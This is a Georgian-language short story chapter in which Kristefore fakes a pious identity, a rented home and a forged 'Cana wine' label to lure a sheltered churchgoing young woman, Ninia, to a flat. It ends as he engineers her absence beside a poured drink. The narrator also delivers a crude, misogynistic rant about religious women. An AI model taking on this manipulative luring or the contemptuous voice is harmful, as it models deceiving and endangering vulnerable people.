უფრო მაღალი ჩრდილები – 5 – ნინია

umc
შაბათს შუადღით ქრისტეფორე საყიდლებზე წავიდა. იყიდა ერთი დიდი შანდალი და წვრილი ლურსმნების შეკვრა. მერე საეკლესიო მაღაზიაში შეიარა და ოცი სხვადასხვა ზომის ხატი შეიძინა. მაღაზიაში აქცია ჰქონდათ, ყოველ შეძენილ სამ ხატზე მეოთხეს უფასოდ გჩუქნიდნენ. ასე რომ მხოლოდ თხუთმეტი ხატის საფასურის გადახდა მოუწია. ის კი არადა, მადლიერმა გამყიდველმა გოგონამ, ათი ცალი თაფლის სანთელიც აჩუქა. მაღაზიაშივე იყიდა ლოცვების წიგნი და ფსკვნილიც.
საღამოს, ინტერნეტში უძრავი ქონების გაქირავების საიტზე შევიდა და მთელი კვირა დღისთვის ერთოთახიანი „ხრუშოვკა“ იქირავა, დილის რვა საათიდან ის ბინა მისი იქნებოდა ოცდაოთხი საათის განმავლობაში.
შემდეგ ფოტოშოფში შუა საუკუნეების რომელიღაც მოზაიკიდან, სადაც ქრისტეს სასწაულები იყო ნაჩვენები, კანას ქორწილის სცენა ამოჭრა და დაამუშავა. ზედ დაასვა შტრიხ-კოდი, წააწერა რაღაც გამოსასვლელი ცნობები და „CANA WINE. ზომებში გაასწორა, ამობეჭდა, წებო წაუსვა და ძველ ღვინის ბოთლზე მიაკრო.
კვირას დილით ნაქირავებ ბინაში წავიდა, გასაღები რომ აეღო. კორპუსთან ცოტა ადრე მივიდა, მეპატრონეს დაურეკა, იმან კიდევ ახლა დამლაგებელი მყავს, დაალაგებს და გადმოდირეკავ მეთვითონო.
სინამდვილეში იმ ადამიანების სრულ უმეტესობას, რომლებიც ბინებს დღიურად აქირავებენ, არანაირი დამლაგებლები არ ჰყავთ; რაოდენ ვაჟკაცური გარეგნობისაც არ უნდა იყოს გამქირავებელი, იცოდეთ, რომ თქვენთან შეხვედრამდე ნახევარი საათით ადრე, რომელიღაც ქიმიური ნივთიერებით აყროლებული ტილო ეკავა ხელში და იატაკს გულმოდგინედ ხეხავდა. ჭურჭელსაც გულდასმით აკრიალებდა და უნიტაზსაც ელოლიავებოდა “დომესტოსით”. უბრალოდ, ასეთ ადამიანებს რატომღაც ეთაკილებათ იმის თქმა, რომ თავად ალაგებენ სახლს.
ბევრი რომ აღარ გავაგრძელო, ცხრის ათი წუთისთვის ქრისტეფორეს უკვე ხელში ეკავა ბინის გასაღები. დაახლოებით ხუთი წუთი სახლში დადიოდა, შეისწავლა სად რა იყო, შემდეგ კი გარეთ გავიდა და მანქანიდან ამ დილით ნაყიდი ხილი და წინა დღეს შეძენილი ნივთები ამოიტანა.
ცხრას აკლდა ათი წუთი, როცა ტუმბოს თავზე უკვე ეკიდა ოცი ხატი. მათ ქვეშ შანდალი იდო, სადაც ორი სანთელი იყო დამაგრებული. დანარჩენი სანთლები კი შანდლის გვერდით ეწყო. შანდლის გვერდზევე იყო ლოცვების წიგნიცა და ფსკვნილიც.


***
ნინია ჩხაიძე ცნობილი მსახიობისა და “დამსახურებული არტისტის” ვარლამ ჩხაიძის შვილიშვილია, უბნის #1„კაი“ ბიჭის, ვარლამ ჩხაიძის – მეტსახელად სტიქარას და, გოგო, რომელსაც, ბავშვობიდანვე რაღაცებს აჯერებდნენ და საბოლოოდ დიდი კომპლექსიანი დედალი შეიქმნა. გარეგნობით არაუშავს, პინტასავით ნაშა ვერაა, მაგრამ გულზეც არ შემოგეყრებათ. რომელიღაც იაფასიან სალონში დახვეული თმით, მუხლსქვემო კაბითა და სათნო და გულუბრყვილო თვალებით დადის. აი, ისეთი გოგოა, სამარადჟამო უბიწოთა კატეგორიაში რომ გადიან, თუნდაც გათხოვებისა და შვილების გაჩენის მერე.
ბედის ირონიით ზოდიაქომაც კი დაღი დაასვა ამ მხრივ.
ნიჭითა და ჭკუა-გონებით არასოდეს გამოირჩეოდა. ხმაც საშინელი აქვს, მაგრამ მამის მეგობარი მღვდლის გამოისობით ეკლესიაში მაინც გალობს. ეკლესიის გარდა დადის მხოლოდ იქ, სადაც ძმა დართავს წასვლის ნებას. და ეს ყველაფერი ბუნებრივად მიაჩნია.
***
დილის ათის წუთები იყო, როდესაც ქრისტეფორემ ნანეტის ერთ-ერთი უბნის, ერთ-ერთ ეკლესიაში შეაბიჯა, წმ.გიორგის ხატის წინ სანთელი დაანთო და შემდეგ ნინიას გვერდით დადგა. საკვირაო ლოცვას ერთად უსმენდნენ.
ვარლამი სტიქაროსანი იყო ამ ეკლესიაში, მაგრამ ერთი კვირის წინ იჩხუბა, ხელი მოიტეხა და ამიტომაც დროებით შეეწყვიტა ღვთისმსახურება. ქრისტეფორემ ეს ყველაფერი კარგად იცოდა.
მამა კალისტრატეს ბოხი ხმა კედლებს ბამბასავით ეხეთქებოდა.
ნინია შიგადაშიგ თვალს აპარებდა ხოლმე ქრისტეფორესკენ, მაგრამ როგორც კი ბიჭი საპასუხო მზერას შეავლებდა, გოგო მაშინვე საკურთხევლისკენ იხედებოდა, ვითომც არაფერიო. არადა ვინ იცის გულს რა ჭია უღრღნიდა, ოღონდ ეს ბიჭი გამომელაპარაკოსო. ქრისტეფორეც კარგად ხვდებოდა ამ ყველაფერს და შეეძლო არც არასდროს გამოლაპარაკებოდა ამ გოგოს, მშრალზე დაეტოვებინა, მაგრამ გეგმა ამბის სხვანაირ განვითარებას ითხოვდა.
– რა სასიაოვნო ხმა აქვს მამა კალისტრატეს, არა? – ჰკითხა ნინიას.
გოგო დაიბნა, თუმცა უნდოდა, მაგრამ მაინც არ ელოდა რომ მის გვერდით მდგომი ვაჟი გამოელაპარაკებოდა, ამიტომაც ნაჩქარევად უპასუხა:
– ჰა? აა ჰო, კი, ძალიან ტკბილი ხმა აქვს, ძალიან საყვარელია.
ქრისტეფორემ გაუღიმა. გაუღიმა გოგომაც.
– დიდი ხანია რაც ამ ეკლესიაში დადიხართ?
– სამი წელი. მანამდე ლომიძის ქუჩაზე რომ წმინდა გიორგის ეკლესიაა იქ დავდიოდი, სანამ მამა კალისტრატე იქ იყო. რაც აქ გადმოიყვანეს, იმის მერე აქ ვარ. თქვენ?
– მე იშვიათად დავდივარ ხოლმე ეკლესიაში. სახლში ლოცვას ვამჯობინებ. ცუდად არ გამიგოთ, მაგრამ, ხომ იცით, დღესდღეობით ძალიან ბევრი ვინც ეკლესიაში დადის, ლოცვასაც კი არ უსმენს ხოლმე. ხვდებით, როგორებზე ვამბობ? ძალიან ვბრაზდები, მაგრამ რა ვქნა! – ნათქვამი ცოტა ხელოვნურად გამოუვიდა ქრისტეფორეს, მაგრამ გოგო ვერაფერს ამჩნევდა.
– დიახ, დიახ ვხვდები.
– ახლა, უბრალოდ რატომღაც ძალიან მომინდა მოსვლა და მოვედი – თქვა ქრისტეფორემ და ნინიას ანთებული სანთლიდან ცეცხლი თავისაზე გადაიკიდა.
– ჰო, მესმის. მეც დამინახავს ადამიანები, რომლებიც მხოლოდ და მხოლოდ მეგობრების სანახავად დადიან ხოლმე. ლოცვას და ქადაგებას როგორ არ უნდა უსმინო ადამიანმა თუ ეშმაკს არ ყავხარ დამორჩილებული?! თანაც მამა კალისტრატეს ქადაგებას! ისეთი საინტერესოა ისეთი, რომ რავიცი. ლოცვა რომ რჩება სულ სხვადასხვა თემაზე გვესაუბრება ხოლმე, ძალიან განათლებულია.
– ჰოო? – ვითომ გაიკვირვა ქრისტეფორემ – დარწმუნებული ვარ, ძალიან საინტერესო მოსაუბრე იქნება.
– კი, ნეტავი ბევრი გვყავდეს მაგნაირი პიროვნება. ძალიან ბევრი რამ იცის. წინა კვირას მაგალითად მსოფლიოს ტექნიკურ პროგრესზე ისაუბრა, ეს აიფონები, ლეპტოპები, ბანკის ბარათები და ეგეთები თურმე პირდაპირ ძირს უთხრის ჩვენს სარწმუნოებას. რას წარმოვიდგენდი თუ ასე იქნებოდა, მაგრამ ისე დაასაბუთა, რომ ნამდვილად ასეა.
აი, აქ კი გაიჭედა ქრისტეფორე, ამაზე რა უნდა ეპასუხა არ იცოდა. არ ეგონა მთლად ასეთ იდიოტი თუ აღმოჩნდებოდა ნინია. საინტერესოაო, მიუგდო სიტყვა და დაახლოებით ნახევარი წუთი ხმა არ ამოუღია. შემდეგ როგორც იქნება ამოღერღა.
– თქვენი სახელი, ქალიშვილო?
– ნინია – ლოყები კიდევ უფრო შეეფაკლა გოგოს. – თქვენი?
– ლაშა. შენობით მომმართე ხოლმე. სასიამოვნოა შენი გაცნობა.
– ჩემთვისაც.
– სახელიც რა ლამაზი გქვია!
– ოჰ – კიდევ უფრო დაიმორცხვა ნინიამ – დიდი მადლობა.
– რისი მადლობა. მე ტყუილს არასდროს ვიძახი. ღმერთია მოწმე. დღეს უნდა ეზიარო?
– აბა რა! შენ?
– რა თქმა უნდა! მმ, ცოტა მერიდება ამის თქმა მაგრამ, ზიარების შემდეგ ხომ არ გაგვესეირნა? თუ წინააღმდეგი არ იქნები.
ნინია მეტს ვეღარ დაიმორცხვებდა, სულ რომ მამაზეციერი ჩამოსულიყო და ეთხოვა კიდევ უფრო დაიმორცხვეო! ღმერთო დიდებულო, ეს რა დღეს მოესწრო! უბნის კაი ბიჭის – სტიქარას დას, ნინია ჩხაიძეს გასეირნება შესთავაზა უცხო ბიჭმა. ნინია ჩხაიძეს! აფორიაქდა, სიტყვა ვერ დაძრა, მხოლოდ მმმ ააა მმმ ბგერები გამოუშვა, რაზეც ქრისტეფორემ პასუხის გაცემა არ აცადა და ცოტა უფრო შეარბილა თავისი წინადადება.
– თუ წინააღმდეგი ხარ, კარგი არაუშ…
– არა, არა, რა წინააღმდეგი, გავისეირნოთ. – თქვა და თავი დახარა.
ახლა მხოლოდ ზიარებას უნდა დალოდებოდა მღვდელაძე.
– ძალიან კარგი. ზიარების მერე გავისეირნოთ. ახლა მოსმენა გავაგრძელოთ, ხო?! ბოდიში, ლოცვას მოგწყვიტე.
ნინიამ ახლაღა გააცნობიერა, რომ მართლა მოწყვეტილი იყო ლოცვას. მსგავსი რამ არასოდეს გაეკეთებინა და ამის გამო საშინელი შინაგანი დისკომფორტი იგრძნო. თავისთვის რაღაც ჩაიბურტყუნა, პირჯვარი გადაიწერა და „ლაშას” უთხრა.
– ა, არა, საერთოდ არ მოგიწყვეტივარ.
ქრისტეფორემ გაიღიმა. გვერდით ჩუმად ედგა ახლახანს პირადად გაცნობილ გოგოს, რომელსაც უკვე დიდი ხანია იცნობდა. იცნობდა და რცხვენოდა მისი არსებობა; ასეთი გოგოები ქვეყნის პირველი მტრები არიანო, სულ მეუბნებოდა. რაღაც მხრივ მართალიც იყო. ჰო ხვდებით რა ტიპისანი არიან ასეთები – შეიძლება ისე მოკვდნენ, რომ ბიჭს არც კი აკოცონ, ქმარსაც კი. გათხოვებამდე საქმროსთანაც კი არ დაწვებიან, სულ რომ ორმოცდაათი წლისანი იყვნენ. ასეთ ქალებს ოდესმე სექსი თუ ექნებათ, ისიც მხოლოდ ერთ პოზაში და ისიც მხოლოდ იმის გამო, შვილი რომ გააჩინონ. დაყრიან მერე ნაშიერებს, მამასავით და დედასავით რომ აზროვნებენ – ისეთებს. რომ დაიზრდებიან, მოვლენ ეს ნაშიერები ქვეყნის სათავეებში და ამოურეცხავენ ტვინს მთელ თაობებს, რაღაც ისეთ სირობებს დააჯერებენ – აი, ნინიას რომ აჯერებდნენ. და ეს ყველაფერი წრესავით იტრიალებს და იტრიალებს. წლების შემდეგ ისევ მოგვევლინებიან ისეთი გოგონები, რომლებიც შეიძლება ისე მოკვდნენ, რომ ბიჭს არც კი აკოცონ, ქმარსაც კი. ნუ იტყვით, ვისი რა საქმეა მაგათი ცხოვრებაო. ვიცით, რომ ეს მათი არჩევანია, მათი პოზიცია – მთავარია აპკი შეინახონ ჯანმრთელად – მაგრამ ქრიტეფორემ ტრაკში გაიკეთონ ეგ არჩევანი, თაობებს რომ ურეცხავენ ტვინსო. ეს ხომ ის ქალები არიან მარხვის დროს მღვდლისგან რომ იღებენ ნებართვას, ქმარს მივცე თუ არაო?! და მღვდლებიც მარტო იმიტომ რთავენ ნებას, რომ ამ ქმრებმაც შეიძლება ვეღარ გაუძლონ და ბოზებში წავიდნენ – ბოზები კიდევ ოოო დიდი ცოდვაა ჰო იცით! ამიტომაც ეუბნებიან მიდი და მიეო!
არადა, ასეთი ქალების ქმრები, მე რომ მკითხოთ, მარტო ბოზებში პოულობენ წამიერ შვებას. მიადგებიან და ეტანჯულებიან რაღაც სიზმრებში ნანახ პოზებში. ეფერებიან, სუნავენ, ტუჩებში კოცნიან და მერე რცხვენიათ, არ ამხელენ ვიღაცის “ნამინეტარ” ტუჩებს რომ კოცნიდნენ. ამიტომაც, საერთოდ აზრი არ აქვს ის მღვდლები თანხმობას ეტყვიან ცოლებს თუ არა, ეს კაცები მაინც წავლენ ბოზებში, იქ პოულობენ წამიერ ხსნას და მაგიტომ. აბა სახლში – იქ, სადაც სითბოს არიან მოკლებულნი, რა დაედგომებათ?! ეგეც არ იყოს და, რომ აღარ იციან რაში დააბანდონ თავიანთი სიამოვნების კაპიტალი, სხედან და კაზინოებსა და ტოტალიზატორებში აღამებენ და ათენებენ. რაღაც ფუტურისტულ-მეოცნებურ აზარტში შედიან და ფსონებს რაზე აღარ დებენ – ჰონდურასის ჩემპიონატის რომელიღაც მატჩის ნაკლებ ყვითელ ბარათზე, ლიბიის პრემიერლიგის ცენტრალური მატჩი მეტ კუთხურზე… მერე იქ გაცნობილ ბიჭებთან ერთად წავლენ და იაფასიანი ალკოჰოლით გაიჭყიპებიან. რა ქნან, ესაა მათი ცხოვრება, მათი გართობა და შვება. აბა სახლში რომ მივლენ იციან, რომ იქ ყველაფერი ისე იქნება, როგორც საეკლესიო კალენდრები ეტყვიან ცოლებს. თუმცა მარტო ქალებშიც არაა საქმე: ასეთ დედლებს ხშირად კაცებიც თავისნაირები ჰყავთ და ესენიც დიდად ვერც აცნობიერებენ თავიანთ ყოფას. აი, ამ ყველაფერს, უბრალოდ ინსტიქტურად აკეთებენ, იციან, რომ ასე უნდა ქნან და მორჩა. ხშირად ასეთი კაცები თავად ქმნიან ასეთ ქალებს, ამას ამბობდა სულ ქრისტეფორე.

.
***

ზიარების მერე ნინია და ლაშა შუბლგაზეთილნი მიუყვებოდნენ ქალაქის ერთ-ერთი გამზირის ტროტუარს. მანქანით გასეირნებაზე უარი უთხრა. ვაი და ნათესავს დაენახა უცხო ბიჭის მანქანაში!
დამავიწყდა მეთქვა, მანქანა ჩემგან ითხოვა, მამაჩემის მანქანა იყო. მე ვთხოვე და მერე ქრისტეფორეს ვათხოვე.
ხმას ჯერ არცერთი იღებდა. არ იცოდნენ რითი დაეწყოთ საუბარი. ბოლოს როგორც იქნა, ქრისტეფორემ თავი ნინიასკენ მიატრიალა და დუმილი დაარღვია;
– რამ გადაგაწვეტინა ეკლესიაში მისვლა? – ჰკითხა ნინიას.
– რავი. ისეთმა არაფერმა, უბრალოდ დედაჩემს ბავშვობიდან დავყავდი და შევეჩვიე. მერე ჩემი მამაო რომ შევიძინე, უფრო მეტად მინდოდა ხოლმე სიარული და იმის მერე ყოველ კვირა დავდივარ.
– ჰოო კარგია. მეც ძალიან მინდა ხოლმე ყოველ კვირა ვიარო, მაგრამ აი, ხო გითხარი, რატომაც არ დავდივარ. ძალიან ემოციური ვარ და არ მინდა გავბრაზდე ხოლმე.
– ჰო არაუშავს. მთავარია სახლში ამბობ ლოცვებს.
– აჰა – დაეთანხმა ბიჭი – მარხვას სულ იცავ?
– აბა რა! რვა წლის მერე ჯერ არცერთი მარხვა არ დამირღვევია. ოთხშაბათსაც და პარასკევსაც კი ვიცავ ხოლმე. შენ?
– რა თქმა უნდა. ბოლო ოთხი წელია ყველა მარხვა დაცული მაქვს.
– კარგია. ბევრი ცდუნებაში ვარდება ხოლმე.
– ჰო, ჩემს ბევრ მეგობარს უჭირს შენახვა, რამდენიმემ დაარღვია კიდეც ერთი-ორჯერ – სად ყავდა ქრისტეფორეს მეგობრები?! მხოლოდ ჩემთან ძმაკაცობდა და მარხვაზე ცხოვრებაში არ ვყოფილვარ.
– თავიდან მეც მიჭირდა. ვტიროდი ხოლმე ისე მინდოდა შოკოლადი. – ღიმილით თქვა ნინიამ.
– როდესაც სულიერად მტკიცედ ხარ ადამიანი, ვერანაირი შოკოლადი ვერ გაცდუნებს. – თავაწეულმა თქვა ქრისტეფორმე და გოგოს ისეთი ღიმილი გამოუცხო, რომ ვინ მიგდია გრეგორი პეკი!
– ჰო, მართალი ხარ. სიმტკიცეს ვერას დააკლებს სატანა.
– აბა რა. ნინია, ეკლესიის გუნდში გალობ ხო?
– კი. მამა კალისტრატემ მიმაბარა მგალობლებს. იმათმა მასაწვლეს ბევრი რამ.
– მომწონს, როდესაც გოგო კარგად მღერის.
ნინიამ ეს რეპლიკა კომპლიმენტად მიიღო და დაიმორცხვა, თავი ჩახარა, ბიჭს თვალს ვერ უსწორებდა ისე ამოღერღა „მადლობა”.
– ესეიგი სიმღერა გიყვარს…
– კი, ძალიან, შენ?
– მეც. ზოგადად რა სტილის მუსიკას უსმენ?
– რავი აბა, რაც მომწონს იმას. ყველაზე მეტად საგალობლები მიყვას, მაგრამ სხვებსაც ვუსმენ – პოპულარულებს. ისე გასულ ზაფხულს იმის კონცერტზე ვიყავი – აღტაცებულმა გაიხსენა წასრული – ანდრეა, უჰ რაგვარია, ჰო, ბოტიჩელი.
– ჰოო, ანდრეა ბოტიჩელი ძალიან კარგია. მეც მიყვარს. – აჰყვა ქრისტეფორე.
– კი, ძაან ნიჭიერია. თან ეგ ხომ ბრმაა და მაინც რა კარგი მომღერალია.
ქრისტეფორე ვერ მიხვდა, რას ნიშნავდა „ბრმაა და მაინც რა კარგი მომღერალია”, მაგრამ აღარ გაუგრძელა ამაზე საუბარი.
– რუსული სიმღერებიც მომწონს, ქალაქურებიც; უცხოურებიდან ადრე ჯექსონი მომწონდა ძალიან, მაგრამ მერე მამა კალისტრატემ ისეთები გვითხრა მაგაზე, რაღა მომასმენინებს?!
– რეები გითხრა?
– რა და მასონი ყოფილა.
– ვინ, ჯექსონი? – თქვა და თვალები ისე აქაჩა ზემოთ, გეგონებოდა მართლა შეიცხადა ჯექსონზე მიკრობილი იარლიყიო.
– ჰო ეგ, ათას სისაძაგლეს სჩადიოდა. ჯერ კანის ფერი რომ შეიცვალა ეგ არის დიდი ცოდვა. ღმერთმა შავი გაგაჩინა და შენ მის წინააღმდეგ მიდიხარ როცა ასეთ რამეს აკეთებ. მაგას რომ თავი გავანებოთ, როკ-მუსიკოსებსაც ემეგობრებოდა, ეგენი ხომ ეშმაკის პირველი მოციქულები არიან, ჰოდა ეგეთები. ბევრი ცოდვა ჩაიდინა და მაგის სიკვდილიც მაგიტომაა დღემდე ასე ბურუსით მოცული. დასაჯა ღმერთმა. კი ამბობენ ექიმმა მოკლაო, მაგრამ ალბათ ცოდვებისგან აღმოხდა სული.
– ჰო. ბევრი რამ არაა გაცხადებული სამყაროში. არც ამ ცნობილი ადამიანების სიკვდილი. შეუცნობელია ბევრი რამ.
– უფლის გზებიც – სიტყვა მოუჭრა ნინიამ, ესაოდა ფრთიან ფრაზას ჩავრთავ საუბარშიო.
– რა თქმა უნდა. ზოგადად ძალიან საინტერესოა ჩვენი დედამიწა. – შენ რას ფიქრობ? თითქოს ყველგან სიმბოლოებია დამალულიო. შესაძლოა ჩვენც სიმბოლოები ვართ რაღაცის.
– კი, ნამდვილად ასეა – დაეთანხმა გოგო, ოღონდ მემგონი ვერ გაიგო რას გულისხმობდა ქრისტეფორე.
– აი, რა არის იცი საინტერესო?! – თითქოს ყველგან სიკვდილი და სიცოცხლე ებრძვიანო ერთმანეთს. აი, ახლა გამახსენდა, ერთი ამბავი. მოგიყვები, ჰო?
გოგომ ღიმილით დაუქნია თავი.
– ნანეტიდან სადღაც ორმოც კილომეტრში მონასტერია. იქ ერთი განდეგილი კაცი ცხოვრობდა, მაშინ ჯერ არ იყო იქ მონასტერი, ამ კაცის გარდაცვალების მერე ააშენეს. ჰოდა, ამ კაცს მანამდე ბევრი ცუდი რამ ჩაედინა, მემგონი ციხეშიც იჯდა. და როცა მიხვდა რა საშინელებებს სჩადიოდა, სიკვდილის შიში გაუმძაფრდა, ამიტომაც წავიდა განდეგილად, განმარტოებულ ადგილას, ცოდვების მონანიება უნდოდა. ერთ დღეს ლოცვის დროს უფალი გამოეცხადა და უთხრა რომ დიდ განსაცდელს მოუვლენდა, რომელსაც უნდა გამკლავებოდა და ამით სიკვდილის შიშს დაამარცხებდა. – ქრისტეფორე მოყოლისას თვალს არ აშორებდა გოგოს ინტერესიან სახეს – დიდი დრო არ იყო გასული ამ გამოცხადებიდან, რომ ერთ დღეს ლოცვა ახალი დაწყებული ჰქონდა, ზურგსუკან დათვის ღმუილი შემოესმა…
ნინიამ თვალები ჭყიტა.
– …უზარმაზარი დათვი ედგა უკან. ამ კაცმა იფიქრა, რომ, აი, ახლა კი ნამდვილად მოვიდა ჩემი აღსასრულის დღეო. დამგლეჯს ეს დათვიო. იქვე დანა ედო, რომლითაც ხილს იჭრიდა ხოლმე, ჰოდა აიღო ეს დანა ხელში და ეგონა თავს დაიცავდა, მაგრამ იმხელა დათვს ამ პატარა დანით რას მოერეოდა! მივარდა ეს დათვი და მოუქნია ტორი რამდენიმეჯერ, იმან აიცილა, ხან სად გადახტა ხან – სად. მოულოდნელად, კუთხეში აღმოჩნდა და ამ დათვმაც დაინახა ეს. მისკენ რომ დაიძრა, ამ კაცმა არ იცოდა რაღა ექნა და უცბად ესეთი რამ მოიმოქმედა. გვერდით მაგიდაზე მისივე დახატული მიქაელ მთავარანგელოზის ხატი ედო. აიღო ეს ხატი და დათვს დაანახა. ეს ცხოველი კიდევ ამ ხატის დანახვისთანავე გაჩერდა, არადა უკვე ემზადებოდა ტორის მოსაქნევად…
– ვააა – გაკვირვებისგან პირზე ხელი აიფარა ნინიამ.
– … ჰოდა, როგორ მოხდა, რა მოხდა, ზუსტად აღარ მახსოვს, მაგრამ იმ დღის მერე, ამ კაცმა ეს დათვი მოიშინაურა და საქმეში იხმარებდა ხოლმე. მერე ის კაცი ბერადაც აღიკვეცა და მაგის გარდაცვალების შემდეგ ააშენეს იმ ადგილზე მონასტერი. – დაასრულა გამოსვლა მთხრობელმა და გაიფიქრა ასეთ სირობას მოწეულზეც კი ვერ მოვიფიქრებდიო.
– აუ რა მაგარია, აი, აი პროსტა არ ვიცი რა. დამბურძგლა. არასდროს არ იცი, ღმერთი როდის მოგივლენს სასწაულს. ზოგი რა ბედნიერია, როცა ღვთის რჩეული ხდება. – სინანულით აღნიშნა ნინიამ.
– ჰო, აბა!
– აი, იესოს რამდენი სასწაული ჩადენა შეეძლო.
– რჩეული იყო და იმიტომ – თქვა ქრისტეოფრემ და მიხვდა, რომ სწორედ ახლა უნდა ეხსენებინა კანას ქორწილიც. – აი, თუ იცი, პირველი სასწაული რომ ჩაიდინა ქორწილში, წყალი რომ ღვინოდ გადააქცია და ხალხი გააოცა. ბევრმა მაშინ იწამა იესო როგორც ღვთის შვილი.
– კი როგორ არ ვიცი, კანას ქორწილის სასწაული.
– უი, რა გამახსენდა! სახლში მაქვს კანას ქორწილის ღვინო. ბიძაშვილმა ჩამომიტანა იერუსალიმიდან, საქორწილო მოგზაურობაში იყო იქ, ჰოდა ერთ-ერთ საეკლესიო მაღაზიაში იყიდა. თუ ამომყვები ერთ ჭიქას სიამოვნებით დაგალევინებ.
გოგო გაიბადრა, თვალები გაუფართოვდა და დილემის დიდ მორევში ჩაიძირა. ასეთი კარგი ბიჭი ეპატიჟებოდა სახლში და კანას ქორწილის ღვინოს დალევდა, უბრალო საფერავს კი არა, კანას ქორწილის ღვინოს, იერუსალიმიდან ჩამოტანილს. მაგრამ როგორ შეიძლება უცხო კაცს სახლში გაჰყოლოდა, ხალხი რას იფიქრებდა. და იქნებ, საერთოდაც ეს ბიჭი ატყუებდა? არა, შანსი არაა ლაშა არ იტყუებოდა. შეამჩნევდა ნინია აუცილებლად.
მაგრამ მაინც უარი დასცდა:
– ძალიან კი მინდა, მაგრამ ვერ წამოვალ.
– რატომ?
– აიი, როგორ გითხრა.
– თუ ძალიან გინდა კანას ქორწილის ღვინოს დალევა, რა გვიშლის ხელს?
– აი, როგორ ვთქვა, არ მინდა ახლა ცუდად გაიგო, მაგრამ მე ძალიან ტრადიციულ ოჯახში ვარ გაზრდილი და…
– ღმერთო ჩემო, არა, არა, არაფერი გაივლო თავში ცუდი. ამ მარხვაში მიტუმეტეს – პირჯვარი გადაიწერა ქრისტეფორემ – უბრალოდ ავიდეთ ჩემთან ნახევარი საათით, დავლიოთ ერთი ჭიქა ღვინო, ცოტა ვისაუბროთ და მერე გაგაცილებ სახლამდე.
გოგო ისევ ყოყმანობდა; ყოყმანობდა, ყოყმანობდა, ათას სისულელეს თუ ჭკვიანობას ფიქრობდა და ბოლოს, როგორც იქნა გადადგა ერთობ სარისკო ნაბიჯი. სანამ თანხმობას იტყოდა, ისიც გაიფიქრა, უფლის წინაშე არაფერი შემიცოდავს და მატყუარა კაცსაც არ მომივლენდა ღმერთიო.
– მმ, კარგი. მაგრამ ჯერ ჩემებს დავურეკავ, ვეტყვი, რომ ცოტა შემაგვიანდება, ხო?
– რა თქმა უნდა!
ნინიამ აიფონ 6 ამოიღო ჯიბიდან. ვოლფეიფერად ეკლესიის ფოტო ეყენა. ნომერი აკრიფა.
– ალო, ვარლამ, როგორ ხარ?
– …
– რა სად დავეთრევი, ეკლესიაში ვიყავი – განაწყენებულმა უპასუხა.
– …
– ხელი როგორ გაქვს?
– …
– ახლა სად ვარ და თამართან ერთად ვსეირნობ. ცოტა ხანი მეგობართან ავალთ და სახლში მალე მოვალ.
– …
– არ იცნობ.
– …
– კი, გოგოა. მარიამი ჰქვია. მამა კალისტრატეს სულიერი შვილია ესეც.
– …
– კაი, არ დავაგვიანებ. მადლობა.
– …
– არ დავაგვიანებ-მეთქი, ჰო.
– …
– კაი მიდი. გკოცნი.
**
ხუთ წუთში მანქანაში ჩასხდნენ და ქრისტეფორემ ნაქირავები სახლისკენ აიღო გეზი. ძალიან მალე უკვე ბინაში იყვნენ. ლაშამ გოგოს ჩანთა გამოართვა და საკიდზე ჩამოკიდა. ნინიამ არც აცია არც აცხელა, მაშინვე ხატებისკენ გაემართა.
– აუ, რა საყვარელი ხატების კუთხე გაქვს. ძალიან ლამაზია.
– მადლობა. ვცდილობ ხოლმე ყოველთვე ერთი ხატი ვიყიდო.
– ჰიიი, წმინ და რაჟ დე ნის ხა ტიიიი, სად იყიდე, რა ლამაზია?
– გაბედავას გამზირზე რომ საეკლესიო მაღაზიაა იქ.
– აუ როგორ მიყვარს ეგ მაღაზია. ძალიან საყვარელი და მყუდროა.
– ჰო, ძაან კარგი მაღაზიაა. ძაან კარგი, თბილი აურა სუფევს იქ. სულ მანდ ვყიდულობ ხოლმე საეკლესიო ნივთებს. ჩამოჯექი შენ, მე მანამდე ღვინოს მოვიტან. თავი იგრძენი, როგორც საკუთარ სახლში.
ქრისტეფორე სამზარეულოში გავიდა და ღვინის ძველი ნახევრად სავსე ბოთლი აიღო, რომელშიც საფერავი ესხა. ბოთლზე, ის ეტიკეტი ეკრო, წინა დღეს რომ თავად ამობეჭდა.
შემდეგ კარადიდან ორი ჭიქა გამოიღო და გვერდით ოთახში დაბრუნდა.
– ესეც კანას ქორწილის ღვინო – ბოთლი ნინიას დაანახა და მაგიდაზე დადგა. მერე ერთი ჭიქა თავის წინ დაიდო, მეორე ხელში დაიკავა, რომ ნინიასთვის დაესხა.
– ლაშა, მარტო ცხოვრობ? – ჰკითხა გოგომ.
– კი.
– შენი მშობლები სად ცხოვრობენ?
ქრისტეფორემ ტრაგიკული პაუზა აიღო, თავი დახარა და ისე უპასუხა:
– მშობლები არ მყავს – თავი ასწია – ბავშვთა სახლში გავიზარდე.
– ვაიმე, დიდი ბოდიში, არ ვიცოდი – ძალიან შერცხვა გოგოს.
– არაუშავს არაფერია. გავალ ახლა ხილს მოვიტან – თქვა და ღვინით სავსე ჭიქა ნინიას დაუდო წინ.
– არ გინდა რა, არ შეწუხდე.
– არა რა შეწუხებაა.
ქრისტეფორემ გოგოს არც თუ ისე ნატიფი ხელის მტევანი აიღო, ეამბორა და ოთახიდან გავიდა.
ნინიამ რაღაც განიცადა. მერე ჩაფიქრდა. გულში სიბრალულს გრძნობდა ბიჭისადმი, რომელსაც ალბათ არასდროს ენახა მშობლები. და თან უკვე ძალიან მოსწონდა ლაშა, რომელმაც ცხადია ყველაფერს თვითონ მიაღწია, ბავშვთა სახლიდან წამოვიდა და ალბათ რაღაც კარგ სამსახურში მოეწყო, რადგან სავარაუდოდ ძალიან ჭკვიანი იყო. ამიტომაც ჰქონდა თავისი ლამაზი სახლი.
ქრისტეფორემ დიდ თეფშზე დაჭრილი ვაშლი, ბანანი და კივი დაალაგა და ნინიასთან დაბრუნდა. ახლა გოგო რამენაირად გვერდზე ოთახში უნდა გაეშვა.
ღვინო ახლა თავის ჭიქაში ჩამოასხა.
– ჰო, ხელები გადავიბანოთ მემგონი აჯობებს, ჰომ?
– უი, ჰო, რა თქმა უნდა.
– ტუალეტი შემოსასვლელთან არის. ცხელი წყალიც მოდის და ცივი წყალიც. ხელები შეგიძლია ცისფერი პირსახოცით გაიწმინდო. ან თუ გინდა სამზარეულოში დაიბანე.
– ტუალეტში დავიბან.
